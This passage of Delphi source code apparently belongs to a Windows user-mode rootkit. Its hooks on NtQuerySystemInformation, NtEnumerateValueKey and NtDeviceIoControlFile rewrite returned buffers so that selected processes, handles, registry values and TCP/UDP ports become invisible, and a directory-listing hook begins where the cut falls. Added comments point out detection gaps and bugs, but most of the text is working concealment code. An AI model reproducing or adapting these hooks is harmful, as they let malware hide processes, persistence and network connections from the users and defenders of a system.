end;
GetMem(ObjectInformation, 1);
try
ObjectInformationLength := 1;
while True do
begin
Inc(ObjectInformationLength, 1024);
ReallocMem(ObjectInformation, ObjectInformationLength);
Status := NtQueryObject(Duplicate, ObjectNameInformation, ObjectInformation, ObjectInformationLength, @Bytes);
if Status = NTSTATUS($C0000004) then
Continue
else
Break;
end;
HandleName := WideCharToString(ObjectInformation.Name.Buffer);
finally
FreeMem(ObjectInformation);
end;
if ((lstrcmpi(pchar(HandleName), '\device\tcp') = 0) or (lstrcmpi(pchar(HandleName), '\device\udp') = 0)) then
begin
if HandleEntry.HandleAttributes = 2 then
begin
TdiConnectionInformation.RemoteAddressLength := 4;
if NtDeviceIoControlFileNextHook(Duplicate, 0, nil, nil, @IoStatusBlock, $210012, @TdiConnectionInformation, SizeOf(TDI_CONNECTION_INFORMATION) - $16, @TdiConnectionInfo, SizeOf(TDI_CONNECTION_INFO)) = 0 then
begin
TdiConnectionInformation.RemoteAddressLength := 3;
if NtDeviceIoControlFileNextHook(Duplicate, 0, nil, nil, @IoStatusBlock, $210012, @TdiConnectionInformation, SizeOf(TDI_CONNECTION_INFORMATION), @TdiConnectionInfo, SizeOf(TDI_CONNECTION_INFO)) = 0 then
begin
Port := ntohs(TdiConnectionInfo.ReceivedTsdus and 65535);
if IsId(ProcessId) then
begin
AddPort(Port);
end;
end;
end;
end
else
begin
TdiConnectionInformation.RemoteAddressLength := 3;
NtDeviceIoControlFileNextHook(Duplicate, 0, nil, nil, @IoStatusBlock, $210012, @TdiConnectionInformation, SizeOf(TDI_CONNECTION_INFORMATION), @TdiConnectionInfo, SizeOf(TDI_CONNECTION_INFO));
Port := ntohs(TdiConnectionInfo.ReceivedTsdus and 65535);
if IsId(ProcessId) then
begin
AddPort(Port);
end;
end;
end;
CloseHandle(ProcessHandle);
CloseHandle(Duplicate);
end;
finally
FreeMem(SystemInformation);
end;
end;
// Hook replacement for NtQuerySystemInformation.
//
// Calls the original routine (NtQuerySystemInformationNextHook) and, when
// it succeeds, rewrites the returned buffer in place for two information
// classes so that records selected by IsId(...) are no longer visible to
// the caller. How the hook is installed is not shown in this part of the
// file.
//
// Parameters mirror the native API (SystemInformationClass, caller-owned
// SystemInformation buffer, its length, optional ReturnLength).
// Returns the NTSTATUS of the original call unchanged; only buffer
// contents are modified.
//
// Detection relevance: the hook only alters the view of the process that
// is hooked. Cross-checking this output against an enumeration taken from
// another process, from the kernel, or from a forensic snapshot exposes
// the suppressed records.
function NtQuerySystemInformationHookProc(SystemInformationClass: SYSTEM_INFORMATION_CLASS; SystemInformation: PVOID; SystemInformationLength: ULONG; ReturnLength: PULONG): NTSTATUS; stdcall;
var
LastProcessInfo, ProcessInfo: PSYSTEM_PROCESSES;
HandleEntry: SYSTEM_HANDLE_TABLE_ENTRY_INFO;
HandleInfo: PSYSTEM_HANDLE_INFORMATION;
HandlesParsed, Offset: dword;
begin
// Always let the real call run first; nothing is filtered on failure.
Result := NtQuerySystemInformationNextHook(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
if Result <> 0 then Exit;
if SystemInformationClass = SystemProcessesAndThreadsInformation then
begin
// The process list is a chain of variable-length records linked by
// NextEntryDelta (byte offset to the next record; 0 marks the last one).
// Records whose ProcessId passes IsId are unlinked by growing the
// previous visible record's delta so it jumps past them.
Offset := 0;
LastProcessInfo := nil;
repeat
ProcessInfo := PSYSTEM_PROCESSES(pointer(dword(SystemInformation) + Offset));
if IsId(ProcessInfo.ProcessId) then
begin
if ProcessInfo.NextEntryDelta = 0 then
begin
// Matching record is the last in the chain: terminate the chain at
// the previous visible record instead.
if LastProcessInfo <> nil then LastProcessInfo.NextEntryDelta := 0;
Exit;
end
else
begin
// Splice this record out. NOTE(review): no nil check on
// LastProcessInfo here, so this path assumes a preceding visible
// record already exists.
LastProcessInfo.NextEntryDelta := LastProcessInfo.NextEntryDelta + ProcessInfo.NextEntryDelta;
end;
end
else
begin
// Visible record; remember it as the splice anchor.
LastProcessInfo := ProcessInfo;
end;
Offset := Offset + ProcessInfo.NextEntryDelta;
until ProcessInfo.NextEntryDelta = 0;
end
else if SystemInformationClass = SystemHandleInformation then
begin
// Handle table: entries owned by a selected process are overwritten
// with zeros rather than removed. NumberOfHandles is left unchanged,
// so the caller still sees the same count with all-zero rows in it -
// an anomaly a consumer of this table can look for.
HandleInfo := PSYSTEM_HANDLE_INFORMATION(SystemInformation);
HandlesParsed := 0;
while HandlesParsed < HandleInfo.NumberOfHandles do
begin
HandleEntry := HandleInfo.Handles[HandlesParsed];
if IsId(HandleEntry.UniqueProcessId) then
begin
// NOTE(review): the length passed is SizeOf(SYSTEM_HANDLE_INFORMATION),
// not SizeOf(SYSTEM_HANDLE_TABLE_ENTRY_INFO); whether that equals one
// table entry depends on record declarations not visible here.
ZeroMemory(@HandleInfo.Handles[HandlesParsed], SizeOf(SYSTEM_HANDLE_INFORMATION));
end;
Inc(HandlesParsed);
end;
end;
end;
// Translates a caller-visible value index into the real enumeration index
// for NtEnumerateValueKey, skipping every value whose name - treated as a
// path and reduced with ExtractFilePath - matches Root + '\'.
//
// KeyHandle: the registry key being enumerated.
// Index:     the zero-based index the caller asked for.
// Returns the underlying index to pass to the original routine. If the
// real enumeration fails before Index visible values are found, the loop
// breaks and the index reached so far is returned; the caller then receives
// whatever status the original routine reports for that index.
//
// Root, StrCmp and NtEnumerateValueKeyNextHook are defined elsewhere in the
// file; the exact semantics of StrCmp's boolean result are not visible here.
function GetValueShift(KeyHandle: dword; Index: ULONG): dword;
var
KeyValueInformation: KEY_VALUE_BASIC_INFORMATION;
ResultLength: ULONG;
ValueLoop: dword;
RootPath: string;
begin
Result := 0;
RootPath := string(Root) + '\';
// ValueLoop counts visible (non-filtered) values seen so far.
ValueLoop := 0;
while ValueLoop <= Index do
begin
ZeroMemory(@KeyValueInformation, SizeOf(KEY_VALUE_BASIC_INFORMATION));
// ERROR_SUCCESS (0) is compared against an NTSTATUS here; both denote success as 0.
if NtEnumerateValueKeyNextHook(KeyHandle, Result, KeyValueBasicInformation, @KeyValueInformation, SizeOf(KEY_VALUE_BASIC_INFORMATION), @ResultLength) <> ERROR_SUCCESS then Break;
// Terminates the returned name by writing a zero byte at offset ResultLength.
// NOTE(review): no check that ResultLength stays within the local record.
byte(pointer(dword(@KeyValueInformation) + ResultLength)^) := 0;
// Only values NOT matching the filtered root advance the visible counter.
if not StrCmp(RootPath, ExtractFilePath(WideCharToString(PWideChar(@KeyValueInformation.Name)))) then
begin
Inc(ValueLoop);
end;
// The Index-th visible value is at real index Result: stop here.
if ValueLoop > Index then Exit;
Inc(Result);
end;
end;
// Hook replacement for NtEnumerateValueKey.
//
// Forwards to the original routine with the caller's Index remapped through
// GetValueShift, so values filtered by that helper are skipped over and the
// caller sees a contiguous index space without them. All other arguments
// and the returned NTSTATUS pass through untouched.
//
// Detection relevance: the remapping exists only inside the hooked process;
// enumerating the same key from an unhooked context (or from an offline
// hive copy) reveals the skipped values.
function NtEnumerateValueKeyHookProc(KeyHandle: HANDLE; Index: ULONG; KeyValueInformationClass: KEY_VALUE_INFORMATION_CLASS; KeyValueInformation: PVOID; KeyValueInformationLength: ULONG; ResultLength: PULONG): NTSTATUS; stdcall;
begin
Result := NtEnumerateValueKeyNextHook(KeyHandle, GetValueShift(KeyHandle, Index), KeyValueInformationClass, KeyValueInformation, KeyValueInformationLength, ResultLength);
end;
// Hook replacement for NtDeviceIoControlFile.
//
// Calls the original routine and then post-processes two IOCTLs issued to
// the TCP/IP transport so that connections whose local port passes IsPort
// are not reported:
//   * $210012 (the value of IOCTL_TDI_QUERY_INFORMATION) with a
//     TDI_CONNECTION_INFO-sized output buffer: the output is zeroed and the
//     I/O status block is rewritten.
//   * $120003 (the value of IOCTL_TCP_QUERY_INFORMATION_EX) with a 36-byte
//     request: rows in the returned TCP/UDP address tables are compacted
//     out and IoStatusBlock.Information is reduced accordingly.
// Parameters mirror the native API. Returns the original NTSTATUS.
//
// Detection relevance: rows are removed by shifting the remaining rows
// down, and the buffer tail past the new Information length is not cleared.
// A consumer that inspects the bytes between the reported length and the
// original length may find stale duplicate rows left behind by this
// compaction. As with the other hooks, an enumeration taken from an
// unhooked process or the kernel does not reflect these edits.
function NtDeviceIoControlFileHookProc(FileHandle: HANDLE; Event: HANDLE; ApcRoutine: PIO_APC_ROUTINE; ApcContext: PVOID; IoStatusBlock: PIO_STATUS_BLOCK; IoControlCode: ULONG; InputBuffer: PVOID; InputBufferLength: ULONG; OutputBuffer: PVOID; OutputBufferLength: ULONG): NTSTATUS; stdcall;
type
// Layout of the connection-statistics record returned for the TDI query.
// Only ReceivedTsdus is read below (its low 16 bits are treated as a port).
TDI_CONNECTION_INFO = record
State: ULONG;
Event: ULONG;
TransmittedTsdus: ULONG;
ReceivedTsdus: ULONG;
TransmissionErrors: ULONG;
ReceiveErrors: ULONG;
Throughput: ULONG;
Delay: ULONG;
SendBufferSize: ULONG;
ReceiveBufferSize: ULONG;
Unreliable: BOOL;
end;
PTDI_CONNECTION_INFO = ^TDI_CONNECTION_INFO;
type
// Row layouts for the four address tables handled below; the "Ex" forms
// carry an owning process id as well. Ports are stored in network byte
// order, hence the ntohs() before each IsPort check.
TMibTcpRow = record
dwState: DWORD;
dwLocalAddr: DWORD;
dwLocalPort: DWORD;
dwRemoteAddr: DWORD;
dwRemotePort: DWORD;
end;
PMibTcpRow = ^TMibTcpRow;
TMibUdpRow = record
dwLocalAddr: DWORD;
dwLocalPort: DWORD;
end;
PMibUdpRow = ^TMibUdpRow;
TMibTcpRowEx = record
dwState: DWORD;
dwLocalAddr: DWORD;
dwLocalPort: DWORD;
dwRemoteAddr: DWORD;
dwRemotePort: DWORD;
dwProcessId: DWORD;
end;
PMibTcpRowEx = ^TMibTcpRow;
TMibUdpRowEx = record
dwLocalAddr: DWORD;
dwLocalPort: DWORD;
dwProcessId: DWORD;
end;
PMibUdpRowEx = ^TMibUdpRowEx;
var
MibTcpRow, NextMibTcpRow: PMibTcpRow;
MibTcpRowEx, NextMibTcpRowEx: PMibTcpRowEx;
MibUdpRow, NextMibUdpRow: PMibUdpRow;
MibUdpRowEx, NextMibUdpRowEx: PMibUdpRowEx;
Size: dword;   // number of rows currently in the table (recomputed after each removal)
Rows: dword;   // index of the row being examined
begin
// Real call first; filtering only happens on success.
Result := NtDeviceIoControlFileNextHook(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, IoControlCode, InputBuffer, InputBufferLength, OutputBuffer, OutputBufferLength);
if Result <> 0 then Exit;
if IoControlCode = $210012 then
begin
if OutputBufferLength = SizeOf(TDI_CONNECTION_INFO) then
begin
// The low 16 bits of ReceivedTsdus are interpreted as a port here; this
// matches how the earlier TDI query in this file derives Port.
if IsPort(ntohs(PTDI_CONNECTION_INFO(OutputBuffer).ReceivedTsdus and 65535)) then
begin
ZeroMemory(OutputBuffer, OutputBufferLength);
// $141 is written as the completion status; its meaning to the caller
// is not established by anything visible in this file.
IoStatusBlock.Status := $141;
IoStatusBlock.Information := 0;
end;
end;
end;
if IoControlCode <> $120003 then Exit;
if InputBufferLength = 36 then
begin
// The request is matched on selected bytes of its 36-byte body. This is
// consistent with a TDI entity/object-id request: byte 0 distinguishes
// the TCP (0) and UDP (1) transport entity, byte 16 selects the basic (1)
// or extended (2) address table - treat these as inferred, not confirmed.
if ((pchar(InputBuffer)[1] = #4) and (pchar(InputBuffer)[17] = #1)) then
begin
// Presumably refreshes the set that IsPort consults; defined elsewhere.
UpdatePorts;
if pchar(InputBuffer)[0] = #0 then
begin
if pchar(InputBuffer)[16] = #1 then
begin
// TCP basic table. For each matching row, the rows after it are moved
// down over it and the reported length shrinks by one row; Rows is not
// advanced so the row that slid into this slot is examined next.
Size := IoStatusBlock.Information div SizeOf(TMibTcpRow);
Rows := 0;
while Rows < Size do
begin
MibTcpRow := PMibTcpRow(pointer(dword(OutputBuffer) + (Rows * SizeOf(TMibTcpRow))));
if IsPort(ntohs(MibTcpRow.dwLocalPort)) then
begin
NextMibTcpRow := pointer(dword(MibTcpRow) + SizeOf(TMibTcpRow));
CopyMemory(MibTcpRow, NextMibTcpRow, IoStatusBlock.Information - (dword(NextMibTcpRow) - dword(OutputBuffer)));
Dec(IoStatusBlock.Information, SizeOf(TMibTcpRow));
Size := IoStatusBlock.Information div SizeOf(TMibTcpRow);
end
else
begin
Inc(Rows);
end;
end;
end
else if pchar(InputBuffer)[16] = #2 then
begin
// TCP extended table; same compaction using the extended row stride.
Size := IoStatusBlock.Information div SizeOf(TMibTcpRowEx);
Rows := 0;
while Rows < Size do
begin
MibTcpRowEx := PMibTcpRowEx(pointer(dword(OutputBuffer) + (Rows * SizeOf(TMibTcpRowEx))));
if IsPort(ntohs(MibTcpRowEx.dwLocalPort)) then
begin
NextMibTcpRowEx := pointer(dword(MibTcpRowEx) + SizeOf(TMibTcpRowEx));
CopyMemory(MibTcpRowEx, NextMibTcpRowEx, IoStatusBlock.Information - (dword(NextMibTcpRowEx) - dword(OutputBuffer)));
Dec(IoStatusBlock.Information, SizeOf(TMibTcpRowEx));
Size := IoStatusBlock.Information div SizeOf(TMibTcpRowEx);
end
else
begin
Inc(Rows);
end;
end;
end;
end
else if pchar(InputBuffer)[0] = #1 then
begin
if pchar(InputBuffer)[16] = #1 then
begin
// UDP basic table; same compaction.
Size := IoStatusBlock.Information div SizeOf(TMibUdpRow);
Rows := 0;
while Rows < Size do
begin
MibUdpRow := PMibUdpRow(pointer(dword(OutputBuffer) + (Rows * SizeOf(TMibUdpRow))));
if IsPort(ntohs(MibUdpRow.dwLocalPort)) then
begin
NextMibUdpRow := pointer(dword(MibUdpRow) + SizeOf(TMibUdpRow));
CopyMemory(MibUdpRow, NextMibUdpRow, IoStatusBlock.Information - (dword(NextMibUdpRow) - dword(OutputBuffer)));
Dec(IoStatusBlock.Information, SizeOf(TMibUdpRow));
Size := IoStatusBlock.Information div SizeOf(TMibUdpRow);
end
else
begin
Inc(Rows);
end;
end;
end
else if pchar(InputBuffer)[16] = #2 then
begin
// UDP extended table; same compaction.
Size := IoStatusBlock.Information div SizeOf(TMibUdpRowEx);
Rows := 0;
while Rows < Size do
begin
MibUdpRowEx := PMibUdpRowEx(pointer(dword(OutputBuffer) + (Rows * SizeOf(TMibUdpRowEx))));
if IsPort(ntohs(MibUdpRowEx.dwLocalPort)) then
begin
NextMibUdpRowEx := pointer(dword(MibUdpRowEx) + SizeOf(TMibUdpRowEx));
CopyMemory(MibUdpRowEx, NextMibUdpRowEx, IoStatusBlock.Information - (dword(NextMibUdpRowEx) - dword(OutputBuffer)));
Dec(IoStatusBlock.Information, SizeOf(TMibUdpRowEx));
Size := IoStatusBlock.Information div SizeOf(TMibUdpRowEx);
end
else
begin
Inc(Rows);
end;
end;
end;
end;
end;
end;
end;
function NtQueryDirectoryFileHookProc(FileHandle: HANDLE; Event: HANDLE; ApcRoutine: PIO_APC_ROUTINE; ApcContext: PVOID; IoStatusBlock: PIO_STATUS_BLOCK; FileInformation: PVOID; FileInformationLength: ULONG; FileInformationClass: FILE_INFORMATION_CLASS; ReturnSingleEntry: ByteBool; FileName: PUNICODE_STRING; RestartScan: ByteBool): NTSTATUS; stdcall;
var